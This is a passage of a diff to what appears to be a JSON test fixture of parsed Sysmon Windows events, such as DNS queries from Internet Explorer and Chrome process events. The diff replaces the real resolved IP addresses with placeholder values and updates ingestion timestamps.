cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10437,23 +10333,23 @@ "type": "CNAME" }, { - "data": "35.167.55.0", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.24.219.168", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.43.21.209", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.200.225.167", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10461,7 +10357,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10469,7 +10365,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10478,15 +10374,15 @@ } ], "resolved_ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, @@ -10503,22 +10399,19 @@ "pre-usermatch.targeting.unrulymedia.com" ], "ip": [ - "35.167.55.0", - "52.24.219.168", - "52.43.21.209", - "54.200.225.167", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313874262Z", + "ingested": "2021-12-09T13:49:44.739597500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10582,27 +10475,27 @@ "type": "CNAME" }, { - "data": "144.76.67.119", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.77.207", + "data": "89.160.20.156", "type": "A" }, { - "data": "148.251.15.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "176.9.103.51", + "data": "89.160.20.156", "type": "A" }, { - "data": "88.198.208.110", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10610,7 +10503,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10618,7 +10511,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10626,23 +10519,23 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -10658,24 +10551,20 @@ "farm.plista.com" ], "ip": [ - "144.76.67.119", - "148.251.77.207", - "148.251.15.115", - "176.9.103.51", - "88.198.208.110", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313875589Z", + "ingested": "2021-12-09T13:49:44.739603600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10743,52 +10632,52 @@ "type": "CNAME" }, { - "data": "50.17.180.35", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.103.40", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.210.19", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.117.149", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.244", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.222.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "50.19.81.100", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.204.10.30", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" } ], "resolved_ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30" ] }, "network": { @@ -10805,21 +10694,14 @@ "beacon.krxd.net" ], "ip": [ - "50.17.180.35", - "50.19.103.40", - "50.19.210.19", - "50.19.117.149", - "50.19.222.244", - "50.19.222.88", - "50.19.81.100", - "54.204.10.30", - "192.5.6.30" + "89.160.20.156", + "192.168.6.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313876849Z", + "ingested": "2021-12-09T13:49:44.739609500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -10866,7 +10748,7 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -10875,7 +10757,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:r3C/WjbATNIislTQ0M+ySzwnuiw=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -10890,13 +10772,13 @@ ], "ip": [ "10.0.2.15", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313878067Z", + "ingested": "2021-12-09T13:49:44.739615300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -10949,7 +10831,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313879292Z", + "ingested": "2021-12-09T13:49:44.739621100Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.354274600Z'/\u003e\u003cEventRecordID\u003e24\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.350\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccc6-5c8f-0000-001005082900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4832\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11000,7 +10882,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313880666Z", + "ingested": "2021-12-09T13:49:44.739627Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.364042800Z'/\u003e\u003cEventRecordID\u003e25\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.364\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cccc-5c8f-0000-0010e8272900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3208\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11061,7 +10943,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313881891Z", + "ingested": "2021-12-09T13:49:44.739633Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.402119100Z'/\u003e\u003cEventRecordID\u003e26\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User 